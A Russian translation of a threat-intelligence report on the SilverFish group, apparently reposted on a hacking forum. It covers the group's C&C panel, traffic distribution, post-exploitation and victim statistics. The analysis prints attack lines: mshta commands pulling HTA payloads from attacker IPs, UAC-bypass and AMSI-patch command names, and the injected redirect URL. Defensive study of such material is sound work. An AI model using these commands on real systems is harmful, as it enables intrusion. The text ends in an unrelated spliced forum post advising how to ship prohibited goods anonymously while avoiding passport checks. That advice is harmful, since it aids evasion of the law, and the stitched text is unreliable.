Другие возможные кампании против различных регионов: Как объясняется в отчете, наши открытия с участием SilverFish были связаны исключительно с США и ЕС. Тем не менее, могут быть другие текущие операции, нацеленные на другие части мира. Мы основываем это предположение на том факте, что группа SilverFish, по наблюдениям, чрезвычайно организована и способна вводить точно такую же структуру для других регионов, представляющих интерес.
3 Технический анализ
Этот раздел содержит TTP анализ группы угроз SilverFish, включая инфраструктуру C&C, систему распределения трафика, шаги пост-эксплуатации и песочницу для обнаружения вредоносных программ (мы назвали ее VictimTotal Sandbox, см. Раздел 3.4).
В начале нашего расследования взлома SolarWinds команда PTI начала
анализировать данные IOC, опубликованные FireEye [8]. Среди опубликованных
доменных имен databasegalore.com был единственным доступным во время
расследования. Хост-сервер также содержал активную службу PowerMTA на порту
2304. После выполнения фаззинга веб-каталогов группа PTI идентифицировала
другой файл (example.php).
Примечание аналитика: PowerMTA - это агент передачи сообщений электронной почты (MTA) корпоративного уровня для отправки больших объемов критически важных для бизнеса электронных писем.
Click to expand...
На этом этапе у команды PTI было достаточно деталей, чтобы создать профиль отпечатка для рассматриваемого хоста, и она начала сканировать весь глобальный диапазон IPv4, используя технологию быстрого сканирования и снятия отпечатков для хостов с аналогичными характеристиками. По прошествии 12 часов команда PTI выявила более 200 хостов с указанным выше сходством. После фильтрации ложноположительных результатов команда PTI обнаружила C&C серверы группы SilverFish.
Примечание аналитика: Во избежание путаницы в будущем мы удалили начальную фазу обнаружения из версии TLP:WHITE, так как мы не можем предоставить дополнительные сведения, чтобы сохранить нашу запатентованную технологию в этой области.
Click to expand...
После получения доступа к C&C серверу на рассматриваемом хосте мы не ожидали, что попадем в самую критическую часть инфраструктуры SilverFish. В первую очередь мы попытались проверить, имеют ли жертвы какое-либо отношение к программному обеспечению SolarWinds. При более внимательном рассмотрении данных C&C мы смогли наблюдать множество жертв, использующих продукты SolarWinds (см. Рисунок 3). Это было важной вехой, поскольку мы начали наше расследование с IOC атаки SolarWinds, отследили эту ссылку на C&C и наблюдали аналогичные артефакты на сервере. Подробный анализ C&C объясняется в следующем разделе. (Раздел 3.1).
3.1 Анализ C &C
C&C панель злоумышленников SilverFish разработана в очень минималистичном стиле. Основная панель инструментов содержит только зараженных жертв, общий раздел комментариев для каждой жертвы и несколько вариантов фильтрации жертв.
Во время анализа C&C сервера группа PTI заметила, что один из вариантов
фильтра называется "Активная команда". Это может указывать на то, что
SilverFish систематически работает с несколькими командами. Кроме того, в
комментариях жертвы много сленговых слов на английском и русском языках.
Страница сведений о жертве содержит следующую информацию о жертве и список
выполненных задач,
• ID
• UUID
• Instance
• IP
• Country
• Domain\User@Computer
• OS
• Build
• Architecture
• Antivirus
• Is Admin
• Integrity Level
• UAC Setting
• ConsentPromptBehaviorAdmin
• PromptOnSecureDesktop
• First visit
• Last visit
Доступные команды на странице сведений о жертве перечислены ниже. Каждая команда содержит краткое объяснение действия, которое необходимо выполнить; пояснительные комментарии ясно показывают изощренность TTP группы SilverFish.
**Spawn new shell session (port 443)
Spawn new shell session (port 80)
Spawn new shell session (port 25)
Spawn new shell session (port 110)
Spawn new shell session (port 143)
Spawn new shell session (port 443) (+amsi.dll patch WIN10 ONLY)
Spawn new shell session (port 443) (+amsiInitFailed=true WIN10 ONLY) TEST
Spawn new bot instance
Spawn new bot instance elevated (slui, build>=9600, WIN8.1, WIN10) powershell
required
+ console shown. Blocked by WD
Spawn new bot instance elevated (eventvwr, WIN7, WIN8.1)
Spawn new bot instance elevated (sdclt, build>=14393, WIN10) WD alert,
instance dies,
still works
Execute beacon
Execute exe file with cmd
Upload file TEMP
Upload file ProgramData
Download file from bot (specify file path) traffic not encrypted!
Execute command with cmd
Execute command with cmd (RUNAS)
Execute command elevated (fodhelper, build>=10240), full path, no output
returned
Execute command elevated (computerdefaults, build>=10240), full path, no
output
returned
Execute command elevated (slui, build>=9600), full path, no output
returned, powershell required + console shown. if failed, needs manual reg
cleanup
Execute command elevated (sdclt, build>=14393), full path, no output returned,
WD alert, executes, instance dies
Execute command elevated (eventvwr, build>=7600 && build <15031),
full path, no output returned
Execute command elevated (compmgmtlauncher, build>=7600 && build <15031),
full path, no output returned
Detection trigger (ps1) (test)
Detection clean (ps1) (test)
Syntax error (ps1) (test)
Kill bot
**
Доступные команды позволяют злоумышленникам создавать оболочки на портах; 443, 80, 25, 110, 143 с возможностью обхода защиты AMSI через патчинг DLL.
Примечание аналитика: Интерфейс сканирования на наличие вредоносных программ Windows (AMSI) позволяет приложениям и службам интегрироваться с любым продуктом для защиты от вредоносных программ, установленным на машине. AMSI обеспечивает улучшенную защиту от вредоносных программ для конечных пользователей и их данных, приложений и рабочих нагрузок [12].
Злоумышленники также могут выполнять расширенные команды различными способами и загружать произвольные файлы зараженным жертвам. Результаты выполненных команд отображаются на отдельной вкладке следующим образом:
Чтобы загрузить файл на устройства жертвы, злоумышленники используют страницу "список файлов" на C&C сервере, показанную на следующем изображении. Страница содержит базовую форму загрузки файлов, в которой хранятся загруженные файлы с идентификатором. Как только злоумышленники выдают команду "Загрузить файл" со значением идентификатора, выбранный файл загружается на устройства жертвы по пути %TEMP% или ProgramData в зависимости от выбранного типа команды загрузки.
3.1.1 Анализ сервера
В этом разделе мы представляем наши важные результаты, полученные от C&C сервера. Одним из наиболее ожидаемых наблюдений является то, что группа SilverFish использовала множество распространенных методов для усиления защиты сервера. Во-первых, группа установила и настроила AppArmor, который обычно позволяет запускать приложения в изолированной среде. Во-вторых, все журналы, которые можно собирать внутри операционной системы (журналы веб-доступа, журнал аутентификации ssh, история консоли и так далее) были отключены. Наконец, фаерволл настроен для связи только с заранее определенными IP- адресами (рисунок 10).
Одним из наиболее заметных открытий со стороны сервера является конфигурация веб-прокси. Мы обнаружили несколько важных доменов, принадлежащих ряду узлов, включая прокси TDS и C&C. Пример конфигурации представлен на рисунке 11, а все домены можно найти в разделе 6.
Затем группа PTI попыталась получить доступ к ранее назначенному IP-адресу напрямую с помощью запроса GET и сразу же заметила перенаправление на домен securesearchnow.сom. Это открытие было важно, поскольку оно связывало IP-адрес 209.99.40.223 с доменами secureconnectiongroup.сom и securesearchnow.сom. Более того, группа PTI заметила, что несколько IP-адресов в этом диапазоне также направляют запросы на домен securesearchnow.сom. Сходство между доменными именами - еще один аспект корреляции, который нельзя игнорировать.
На рисунке 12 показано сходство между securesearchnow.сom и IP-адресом 208.91.198.23. Оба веб-сервера перенаправляют посетителей на PHP-скрипт, размещенный на freeresultsguide.сom. В идеале мы хотели бы проанализировать исходный код sk-jspark_init.php. Однако группе PTI не удалось найти код сценария во время написания этого отчета. Мы полагаем, что это может дать другой ключ к разгадке группы SilverFish. В любом случае мы включим его в наш репозиторий после того, как он будет проанализирован нами или любой другой исследовательской группой. 4 марта 2021 года Microsoft опубликовала в своем блоге еще один набор IOC [20], связанных с злоумышленниками SolarWinds. Стоит отметить, что домен reyweb.сom в их списке также разрешается как 208.91.198.23, который можно отследить до C&C сервера SilverFish group.
3.1.2 Иерархия команды
Хотя значительное внимание было сосредоточено на реверсинг и выявлении инструментов группы SilverFish, следует также подробно обсудить методологию работы с жертвами и управления командой. Как правило, управляющие серверы управляются одной или несколькими учетными записями администратора. Нечасто можно увидеть несколько учетных записей с разными уровнями разрешений для управления C&C сервером. SilverFish использует командную модель рабочего потока аналогичную современным приложениям для управления проектами, таким как Jira (см. Рисунок 14). Всякий раз, когда новая жертва заражается, она назначается в текущую "Активную команду", которая предварительно выбрана администратором. Каждая команда на сервере C&C может видеть только назначенных им жертв. Кроме того, система имеет возможность автоматически назначать жертв в зависимости от текущей рабочей нагрузки. В ходе нашего расследования мы обнаружили четыре разные команды (а именно 301 302 303 304), которые активно эксплуатировали устройства жертв. Эти команды часто меняют направление почти каждый день или каждые два дня. В Разделе 4.3 мы представляем "График активности злоумышленников", чтобы побудить к дальнейшему изучению рабочего времени группы.
Более того, есть подсказки, указывающие на то, что несколько пользователей управляют панелью SilverFish TDS, что анализируется в следующем разделе 3.2 этого отчета. Каждый пользователь может писать комментарии для каждой жертвы, чтобы определить приоритетность эксплуатации. Основываясь на этих комментариях, мы смогли больше узнать о мотивации группы и приоритетах жертв. Также важно отметить, что большинство комментариев написано на русском сленге и на просторечии. (”dno”,”pidori”, ”poeben”, ”poebotina”, ”psihi”, ”hernya”, ”xyeta”, ”gavno”)
Еще одним важным моментом является то, что исходный код C&C (в PHP-файлах) статически содержит псевдонимы и идентификационные номера 14 человек, которые, скорее всего, работают под контролем 4 разных команд.
• 511 : fingerlink
• 513 : cyberbro fingerlink
• 514 : vie new
• 515 : riki netsupport
• 516 : cyberbro netsupport
• 520 : infoshell
• 521 : riki2509 new hacker
• 522 : cyberbro client eu
• 565 : all local
• 566 : new hacker
• 567 : art
• 567 : mes
• 576 : g test
• 577 : walter
Команда PTI связала некоторые из этих ников с профилями на различных
подпольных хакерских форумах. Мы представляем некоторые из интересных постов,
в которых псевдонимы соотносятся с вредоносными действиями, проводимыми
группой SilverFish.
Следует отметить, что указание только псевдонимов может вводить в заблуждение.
3.2 Анализ TDS
На этапе сканирования диапазона подсетей группа PTI также обнаружила веб- панель, работающую как систему распределения трафика (TDS) для C&C серверов. Панель TDS используется для распределения трафика на несколько C&C серверов и балансировки большого количества трафика жертвы [5]. Это также позволяет группе SilverFish отсеивать приходящих жертв по странам.
Во время расследования PTI Team веб-панель SilverFish TDS была настроена для
приема жертв из следующих стран.
• США
• Канада
• Нидерланды
• Германия
• Англия
• Мексика
• Франция
• Италия
• Испания
• Австралия
• Португалия
• Австрия
• Дания
Список прокси-доменов, используемых для возврата трафика жертвы до достижения C&C сервера, приведен в разделе 6.2 настоящего отчета IOC.
В зависимости от анализа, проведенного на панели TDS, команда PTI считает, что распределение трафика достигается путем внедрения следующих вредоносных кодов PHP и JavaScript на несколько легитимных веб-сайтов. Внедренный код проверяет заголовки хоста, реферера и куки на предмет ожидаемых значений при каждом входящем запросе и отправляет HTTP-запрос GET в
hxxp://mwkh.adsproУtnetwork.com/wordpressComposerUpdate?phpcid=250&php, добавив параметр &hn=% URL-ENCODED-REQUEST-HOSTNAME%. Соответствующий ответ записывается в локальный файл ./wp-assets.php, затем первые 8 байтов ответа кодируются в HEX и передаются клиенту.Click to expand...
В ходе расследования группа PTI стала свидетелем того, как группа SilverFish
переключала прокси-домены TDS несколько раз в день.
3.3 Анализ постэксплуатации
Проанализировав выполняемые жертвами задачи внутри командно-контрольного
сервера, команда PTI получила много подробностей о TTP, проводимом группой
SilverFish после эксплуатации. Мы также смогли связать наш отпечаток, который
был извлечен из одного из IOC SolarWinds, с IP-адресом, указанным как второй
этап на панели C&C (см. Рисунок 20). Выполненные задачи рисуют четкую картину
мотивов, целей и приоритетов этих изощренных злоумышленников. После
первоначального закрепления в системе группа SilverFish использует
общедоступные инструменты красной команды, такие как Empire, cobalt strike,
koadic loaders, а в некоторых случаях PowerSploit и скрипты Powershell для
постэксплуатации Mimikatz. Кроме того, существует множество специально
созданных файлов Powershell, BAT, CSPROJ, JavaScript и HTA, которые в основном
используются для перечисления и извлечения данных. Проанализировав серверы
управления и контроля группы SilverFish, команда PTI собрала все команды,
выполняемые на устройствах-жертвах.
Результаты анализа собранных команд указывают на сильную поведенческую модель.
В следующей таблице приведены шесть наиболее часто используемых команд,
выполняемых группой SilverFish, а также краткое описание каждой из них.
Вхождение| Команда| Объяснение
---|---|---
2880| nltest /dclist :| Перечисляет все контроллеры домена в домене.
2283| nltest /domain_trusts| Возвращает список доверенных доменов
1547| cmdkey /list| Отображает список сохраненных имен пользователей и
реквизиты для входа.
670| net group ”domain admins”/domain| Список пользователей с правами
администратора домена
537| dir c:\\programdata| Печатает содержимое каталога ”programdata”.
(используется для перечисления установленного ПО)
206| powershell -nop -enc %Trimmed...%| Выполняет PowerShell в кодировке
BASE64
Как видно из приведенной выше таблицы, первым делом необходимо перечислить домен жертвы. После перечисления контроллеров домена и доверительных отношений между доменами группа SilverFish обычно сосредотачивается на перечислении самого зараженного устройства.
Среди выполненных команд есть несколько случаев выполнения внешнего скрипта с использованием метода WebClient.DownloadString. Некоторые из выполняемых сценариев являются хорошо известными сценариями пост-эксплуатации, например PowerShellEmpire, Powertools [4], Invoke-SocksProxy [15] и Mimikatz [7]. К сожалению, группе PTI не удалось получить остальные файлы, загруженные этим методом.
Все адреса внешних скриптов, загруженных с помощью метода WebClient.DownloadString, доступны в Разделе 6.10.
В ходе исследования выполненных команд группа PTI заметила, что IP-адреса, используемые для загрузки сценариев после эксплуатации, также соответствовали характеристикам исходного домена databasegalore.com, который использовался для печати отпечатков инфраструктуры SilverFish. IP-адрес обслуживал одну и ту же тему начальной загрузки на порту 80 и службу PowerMTA на порту 9897 (см. Рисунок 20).
3.3.1 Коадик агенты
Одним из других инструментов пост-эксплуатации, используемых группой SilverFish, является широко известный проект Koadic [24]
Примечание аналитика: по словам автора Koadic, "Koadic, или COM Command & Control, представляет собой руткит Windows пост-эксплуатации, похожий на другие инструменты тестирования на проникновение, такие как Meterpreter и Powershell Empire. Основное отличие состоит в том, что Koadic выполняет большую часть своих операций с помощью Windows Script Host (также известного как Windows Script Host). JScript/VBScript) с совместимостью в ядре для поддержки стандартной установки Windows 2000 без пакетов обновления (и, возможно, даже версий NT4) через Windows 10".
В ходе анализа выполненных команд команда PTI обнаружила несколько случаев использования утилиты mshta для выполнения внешних сценариев HTA. В следующем списке перечислены все внешние IP-адреса, которые используются для выполнения кода HTA.
• mshta hxxp://104.128.228.76:9999/PAf3W
• mshta hxxp://149.154.157.248:21/KDnbc
• mshta hxxp://149.154.157.248:443/HRNrz
• mshta hxxp://149.154.157.248:443/HRNrz
• mshta hxxp://149.154.157.248:443/veUlx
• mshta hxxp://149.154.157.248:445/SlaMn
• mshta hxxp://149.154.157.248:8080/KDnbc
• mshta hxxp://149.154.157.248:8080/SlaMn
• mshta hxxp://149.154.157.248:80/SlaMn
Команда PTI смогла получить и проанализировать один из сценариев HTA, выполняемых на устройстве жертвы. После первоначального анализа команда PTI пришла к выводу, что этот сценарий HTA был замаскированным агентом Koadic. Анализируемый образец Koadic был доступен по адресу hxxp://104.128.228.76:9999/PAf3W во время расследования.
После деобфускации агента Koadic следующие значения конфигурации были успешно извлечены.
3.3.2 Скрипт Сарасорта
Команда PTI также смогла обнаружить еще один новый скрипт подсчета, часто используемый группой SilverFish. Инициирующая функция скрипта называется Sarasota и, скорее всего, была написана группой SilverFish. Закодированная форма сценария Сарасоты на следующем изображении была выполнена на машинах более чем 200 жертв.
Декодированное содержимое сценария Сарасота содержит функции для поиска объектов домена в структуре активного каталога домена. Это позволяет группе SilverFish находить файлы или папки любого типа, хранящиеся в активном каталоге целевого домена. Скрипт включает несколько параметров для поиска объектов домена. Он может перечислить принтеры внутри домена и компьютеры с неограниченным делегированием перед выполнением поиска. Более того, он может фильтровать компьютеры с определенными SPN, операционными системами, пакетами обновления и ссылками на серверы. Сценарий Сарасоты также может работать с действительными учетными данными домена или без них.
Некоторые из параметров фильтра Сарасота, используемых группой SilverFish,
перечислены ниже.
• Sarasota -operatingsystem server -Domaincontroller ***
• Sarasota -operatingsystem 2003
• Sarasota -operatingsystem server »
C:\\programdata\\srv.txt
3.3.3 Маячки Cobalt Strike и Empire
В ходе постэксплуатационного анализа команда PTI определила несколько закодированных/обфусцированных команд Powershell для загрузки полезной нагрузки маячков Cobalt Strike и Empire. Почти все полезные нагрузки Cobalt Strike выполняются с помощью сжатых и закодированных команд Powershell. Декодированные и распакованные команды Powershell содержат еще один сценарий загрузчика Powershell. Сценарий второго этапа извлекает полезную нагрузку маячка BASE64 Cobalt Strike и декодирует ее, выполняя операцию XOR с ключом 53.
Выполненные маячки Cobalt Strike используют домен для связи с сервером управления и контроля. Команде PTI удалось извлечь все маячки Cobalt Strike, используемые злоумышленниками SilverFish. В следующей таблице приведены серверы управления и контроля Cobalt Strike, а также список доменов, используемых для взаимодействия.
Примечание аналитика: Domain fronting - это метод обхода цензуры в Интернете, который использует разные доменные имена на разных уровнях связи HTTPS-соединения для незаметного подключения к другому целевому домену, который не может быть различим для третьих лиц, отслеживающих запросы и соединения. [13].
Один из маячков Cobalt Strike, используемых группой SilverFish, напрямую подключался к адресу tanzaniaУsheries.com без использования техники фронтинга домена. Этот конкретный маячок Cobalt Stike был развернут для более чем 20 жертв с именем файла ms6543223.csproj 6.1 и выполнен с помощью команды, показанной на следующем изображении.
Примечание аналитика: служебная программа msbuild.exe и файлы .csproj часто используются для загрузки шеллкода в командных проектах.
Помимо метода доменного фронтинга, группа SilverFish использует возможности Cobalt Strike "mallable C2 profile". На следующем изображении показаны результаты эмуляции шелл-кода маячка Cobalt Strike, внешний домен и фактическое значение хоста. Артефакты, выбранные в профиле C2 [22], легко идентифицировать.
Команда PTI смогла проанализировать одного из агентов Empire, которых использовала группа SilverFish. Как и в случае с маячками Cobalt Strike, загрузчики агентов Empire выполняются с закодированными и сжатыми командами Powershell. После деобфускации загрузчика агента Empire команда PTI извлекла https://149.154.157.248:443 C&C адрес.
3.4 Песочница VictimTotal
Одним из самых шокирующих открытий команды PTI стала веб-панель для тестирования вредоносных полезных нагрузок по списку реальных устройств-жертв с корпоративными решениями EDR и AV. Злоумышленники SilverFish использовали эту систему для периодического тестирования своих вредоносных полезных нагрузок на более чем 6000 устройствах, скриптах и имплантатах-жертвах. Следующие изображения (рис. 30, 31) содержат список жертв с различными решениями корпоративной безопасности. В верхнем разделе содержится краткая информация о вредоносном файле, который периодически сканируется, а в правом столбце представлены результаты сканирования, полученные с помощью средств защиты устройств жертв.
Если загруженный файл получает другой результат обнаружения, веб-сайт уведомляет вошедшего в систему пользователя. Эта функция указывает на то, что члены группы SilverFish отслеживают скорость обнаружения своих полезных нагрузок в режиме реального времени. Группа PTI также заметила две полезные нагрузки, загруженные на панель песочницы для обнаружения файлов, одна из которых называется buildus9_3.ps1 (рисунок 30), а другая - build_eu.ps1 (рисунок 31). Это может означать, что группа SilverFish нацелена на США и ЕС со специально созданной полезной нагрузкой. В следующей таблице приведены хэши MD5 файлов, которые выгружаются для периодической проверки обнаружения.
3.4.1 Удаленное управление NetSupport
Во время анализа содержимого C&C сервера команда PTI смогла собрать файлы buildus9_3.ps1 и build_eu.ps1, которые выгружаются на панель песочницы обнаружения, которая описана в разделе 3.4. На первый взгляд, команда PTI заметила, что файлы сильно обфусцированы, а основная полезная нагрузка зашифрована с использованием шифрования AES.
После деобфускации и извлечения расшифрованной полезной нагрузки внутри файлов Powershell мы наткнулись на еще одну заглушку Powershell, которая декодирует другую полезную нагрузку в кодировке BASE64 с использованием 6-байтовых ключей XOR. Как только второй сценарий выполняется с использованием Invoke- Expression, он сначала создает папку в каталоге% APPDATA% со случайным именем. После создания случайного каталога сценарий удаляет все файлы с расширением ".ps1" из каталога %TEMP%. Это может означать, что этот сценарий предназначен для выполнения в каталоге %TEMP%.
Затем сценарий записывает декодированное содержимое полезной нагрузки, закодированной BASE64 + XOR, в файл со случайным именем ".zip" в созданном каталоге. В следующей строке кода скрипт извлекает содержимое ZIP-файла с помощью функции expand-archive. Проанализировав извлеченное содержимое ZIP- файла, команда PTI обнаружила, что извлеченные файлы принадлежат широко известной многоплатформенной программе удаленного управления под названием NetSupportManager [10]. Сценарий продолжает выполнение, удаляя файл ZIP и переименовывая client32.exe NetSupportManager в ctfmon.exe. Переименованный файл EXE добавляется в реестр HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run для сохранения.
Среди извлеченного содержимого ZIP-файла файл client32.ini содержит необходимые настройки конфигурации для программного обеспечения удаленного доступа NetSupportManager. Команда PTI извлекла оба файла конфигурации client32.ini из скриптов Powershell buildus9_3.ps1 и build_eu.ps1. Извлеченные файлы INI содержат поле HTTP, которое включает значения адресов шлюза и вторичного шлюза.
В конце анализа тематических файлов Powershell группа PTI смогла извлечь все адреса шлюзов, следующая таблица содержит извлеченное имя файла и два адреса шлюза для обоих файлов INI NetSupportManager.
3.5 Топология
В ходе расследования PTI Team одна из обнаруженных командно-контрольных панелей группы SilverFish была 188.120.239.154, которая размещалась в России с AS Label "JSC The First". второй адрес C&C был 130.0.235.92, а IP был зарегистрирован в Украине с AS "ITL LLC". Оба IP-адреса зарегистрированы в домене. В отличие от традиционных атак, в которых используется доменное имя, приобретенное с помощью анонимных платежей, SilverFish использует взломанные домены для перенаправления трафика на свою панель управления и контроля. Мы наблюдали, как в их работе используются легитимные доменные имена 10-летней давности. Чтобы избежать нарушения законного трафика веб-сайта, группа SilverFish создает новые поддомены, что делает практически невозможным для автоматического владельца веб-сайта понять, что его домен используется в атаках. На следующем изображении показан исходный код системы распределения трафика (TDS), который подробно объясняется в разделе 3.2.
Как видно из исходного кода TDS, группа SilverFish явно отбрасывает жертв, происходящих из следующего списка.
• Азербайджан
• Армения
• Беларусь
• Грузия
• Казахстан
• Кыргызстан
• Молдова
• Россия
• Таджикистан
• Туркменистан
• Узбекистан
• Украина
Учитывая частоту смены доменов, мы полагаем, что у группы SilverFish есть более тысячи уже взломанных веб-сайтов, которые меняются почти через день. Таким образом, мы не видели необходимости проводить OSINT-анализ информации о домене, поскольку это вводило бы в заблуждение. Наше исследование также показывает, что значительное количество взломанных веб-сайтов использовали Wordpress. Согласно нашему историческому исследованию APT-групп, существует тенденция покупать учетные данные на подпольных рынках. Однако количество взломанных веб-сайтов с одним и тем же программным обеспечением показывает, что группа SilverFish также может использовать эксплойты 0-дня или N-дня.
4 Статистика и наблюдения
Этот раздел предназначен для того, чтобы подчеркнуть определенные аспекты воздействия SilverFish на различные секторы и страны. Более того, команда PTI могла интерпретировать определенные модели поведения субъектов угрозы с помощью графика их активности.
О случае SolarWinds опубликовано большое количество статей. В этом разделе мы представляем наши результаты с C&C сервера, которые сопоставляют действия группы SilverFish с графиком кампании атаки SolarWinds. Во-первых, мы наблюдали за жертвой примерно в конце августа. Мы пришли к такому выводу, поскольку ID первой жертвы в базе данных был равен 1. Однако могут быть и другие инфраструктуры C&C, которые имеют отдельную базу данных жертв. Во- вторых, заражение приостановилось примерно в середине ноября и набирает обороты в январе 21-го. Причина этого может быть связана с совместным сотрудничеством многих организаций по прекращению работы и эффектом выпуска патча SolarWinds. Остальная часть этого раздела содержит информацию об уровне заражения, затронутых странах и распределении жертв.
4.1 Частота заражения
На следующем графике показано количество жертв, зараженных злоумышленниками с начала их работы. Из этого графика видно, что группа SilverFish работает в течение трех периодов времени.
Термин "Первая волна" будет использоваться исключительно по отношению к
периоду, который начинается с конца 20 августа и заканчивается началом 20
ноября. В этот период атаки злоумышленники в основном заразили корпоративные
компании и государственные учреждения в США. Впоследствии с начала 20 ноября
до конца года произошло серьезное уменьшение числа жертв. Эти результаты
подтверждают сильную корреляцию между атаками SolarWinds и группой SilverFish
на основе данных о тенденциях, опубликованных Cloudflare. Несмотря на то, что
ключевой домен атаки SolarWinds был захвачен и провален, злоумышленники,
похоже, возобновили свои операции с началом нового года. Ожидается, что в 2021
году инфекционная активность и сбор данных продолжатся.
4.2 Затронутые страны и сектора
Как также объясняется в разделе 3.4 настоящего отчета, команда PTI считает, что кампания SilverFish проводилась "в зависимости от региона", поскольку команда PTI наблюдала за сборками определенных вредоносных программ, таких как build_eu.ps1 и buildus9_3.ps1.В соответствии с этими выводами мы можем видеть, что общая цель атаки в США и ЕС имеет тенденцию быть очень похожей.
В то время как США являются наиболее часто подвергаемым атакам регионом, где было зарегистрировано 2465 атак; 1645 жертв из нескольких ЕС. государства, включая Италию, Нидерланды, Данию, Австрию, Францию и Великобританию. Несмотря на то, что Канада и Мексика не имеют никаких правительственных связей с ЕС. или США; мы можем сказать, что эти страны подвергаются нападениям из-за их близких географических/политических отношений с Соединенными Штатами.
Что касается распределения жертв, можно увидеть очень сильный акцент на государственных целях. Среди всех 4720+ целей, зарегистрированных командой PTI, 21,3% были обнаружены как правительственные учреждения. Затем последовали сфера услуг, информационные технологии, образование, оборона и авиация. На первый взгляд, возможно, что SilverFish - это APT, нацеленный на основные критически важные инфраструктуры. Как видно из рисунка в Примере 29; почти все критически важные инфраструктуры (как подробно описано в NIST CyberSecurity Framework [14]) явным образом были нацелены на SilverFish.
Мы считаем, что одним из самых фундаментальных элементов, делающих SilverFish
особенным, является важность целевых организаций. Несмотря на то, что мы не
вправе указывать какое-либо имя цели, чтобы не навредить репутации какой-либо
организации, мы хотели бы подчеркнуть характер выбранных целей, представив
приблизительное распределение доходов организаций-жертв на Рисунке 30.
Обратите внимание, что эти цифры получены из отчетов о государственных доходах
организаций-жертв и предназначены исключительно для того, чтобы читатель мог
более четко интерпретировать корпоративный размер потерпевших.
Распределение секторов, полученное в результате предварительного анализа данных о жертвах, представлено на Рисунке 40. На графике выделяется то, что в основном государственные учреждения подвергаются атакам, проводимым группой SilverFish. Кроме того, 13,5% жертв работают в сфере услуг и гостеприимства, информационных технологий 11,3%, образования 9,2% и обороны и авиации 7,0%. Этот график весьма показателен с нескольких точек зрения. Во-первых, в отличие от других программ-вымогателей или вредоносных программ, группа SilverFish преимущественно нацелена на критически важные организации, такие как энергетика, оборона и правительство или корпоративные компании из списка Fortune500. Во-вторых, команда PTI нашла пояснительные комментарии на C&C серверах, которые явно указывают на игнорирование таких жертв, как университеты, небольшие компании или системы, которые они считают бесполезными.
**4.3 Активность операторов
**
В ходе этого расследования одним из самых захватывающих открытий было обнаружение действующих лиц. Как видно на Рисунке 32 - График активности атакующего; можно увидеть, что SilverFish работает в соответствии с определенным временным шаблоном. В соответствии с осью x на рисунке 30 можно увидеть, что субъекты угроз были в основном активны в период с 08:00 до 20:00, как если бы они работали в соответствии с определенной сменой. Точно так же, обращаясь к оси Y того же графика; можно увидеть, что количество атак, как правило, увеличивается в будние дни, и очень мало записей в выходные дни.
Как также объясняется в разделе "Анализ C&C" этого отчета, мы осознаем тот факт, что SilverFish работает в соответствии с определенным распределением обязанностей посредством команд, которые взаимодействуют друг с другом через C&C. Когда мы принимаем эти результаты во внимание; мы полагаем, что соответствующие органы могут делать определенные ссылки на определенные группы APT на основании своего опыта.
5. Вывод
Созданные в результате трехмесячной исследовательской сессии, мы твердо верим, что наши открытия в группе SilverFish проложат путь для различных оставшихся без ответа вопросов, касающихся многочисленных высокопрофессиональных случаев APT, относящихся к началу 2010-х годов. Прежде всего, мы считаем, что SilverFish можно рассматривать как фундаментальное свидетельство приписывания инцидентов SolarWinds нескольким группам с разными мотивами.
Во-вторых, ожидается, что наше исследование SilverFish станет краеугольным камнем для лучшего понимания организованной киберпреступности за счет смещения восприятия APT-групп от высококвалифицированных экспертов по безопасности к высокоорганизованной преступной сети.
Кроме того, наши данные о SilverFish демонстрируют, что аналитикам безопасности следует воздерживаться от полной автоматизации своих протоколов анализа угроз, поскольку все инфраструктуры SilverFish имеют несколько одновременных IOC, которые ранее относились к разным группам и кампаниям, таким как Trickbot, EvilCorp, SolarWinds, WastedLocker, DarkHydrus и многие другие. По нашему мнению, действия строго после получения разведданных IOC от сторонних ресурсов могут быть одной из основных причин, по которым исследователи не могут понять фактический размах крупномасштабных APT-атак.
Как также неоднократно объяснялось в отчете, мы предполагаем, что могут проводиться текущие операции, в которых используются одни и те же инструменты, тактика и процедуры, нацеленные на разные регионы по разным мотивам. Таким образом, мы считаем, что SilverFish создаст важный прецедент для чрезвычайно широкомасштабной тайной кибероперации с точки зрения ее структуры и операций.
Исходя из вышесказанного, мы считаем, что SilverFish - первая группа, которая нацелена на страны ЕС, используя уязвимости, связанные с инцидентом SolarWinds. Кроме того, мы оцениваем наше исследование группы SilverFish как один из первых случаев, когда цели участников SolarWinds были определены (поскольку ожидается, что SilverFish будет одной из многих) с помощью технических данных. В данном случае мы оцениваем эту цель как разведку и скрытую разведку данных.
Как команда PTI, мы признаем тот факт, что наши открытия на SilverFish порождают столько же вопросов, сколько и ответов. Наблюдение за таким структурированным подходом к скрытому кибершпионажу напоминает нам, что кибервойна по-прежнему будет самым техническим компонентом операций пятого измерения. К сожалению, несмотря на их важность, бюджет и ресурсы, очень немногие организации относятся к информационной безопасности так же серьезно, как противники, такие как группа SilverFish.
Этот случай демонстрирует, что текущие операции по киберпреступности значительно превращаются в гораздо более сложное явление, требующее своевременного взаимодействия между агентствами LE, CERT, частным сектором и сообществами. Мы на собственном опыте убедились, что устранение последствий такой атаки с более чем 4200 целями является чрезвычайно сложной задачей без участия и приверженности каждой стороны.
Наконец, мы хотели бы выразить нашу глубочайшую благодарность нашим советникам, партнерам, CERT Швейцарии и особенно кантональной полиции Vaud за их своевременную поддержку и преданность делу.
Источник: https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf
Автор перевода: yashechka
Переведено специально для
https://xss.is
Так как тематика форума подразумевает анонимность при общении и заключении
сделок,то предлагаю пообщаться про анонимность и при передачи товаров.В данной
теме предлагаю выкладывать известные Вам анонимные способы доставки.
1. Транспортная компания СДЭК. Не при отправки ни
при получении на требуются ни какие документы подтверждающие личность. Для
получения достаточно знать номер трека и ФИО названное отправителем.Также
можно курьером доставить в любое удобное Вам место.
2. Такая же история- DPD, https://www.dimex.ws/, пони-
экспресс, spsr.ru, деловые линии, tk-
kit.ru, cse.ru (РУ-УКРАИНА)!
При получении получатель получит вместе с товаром бланк на котором есть данные отправителя,но они могут быть левыми,паспорт же не спрашивают!
По правилам обязательно нужен паспорт,но по факту его не спрашивают.Бывают у них проверки,тогда уж точно спросят,поэтому при получении\отправлении желательно чтобы кроме Вас там никого не было лишних. В идеале это Вы и кассир,тогда точно не спросят.
Почти все курьерские службы никогда не спрашивали паспорт не при отправке не
при получении!СДЕК,ДИМЕКС,СПСР и т.д.(пони экспресс вроде спрашивали паспорт)
далее если нужно отправить с запретом и анонимно то это ДЕЛОВЫЕ ЛИНИИ(при
отправке паспорт не смотрят),так же можно заказать забор груза и в квитанции
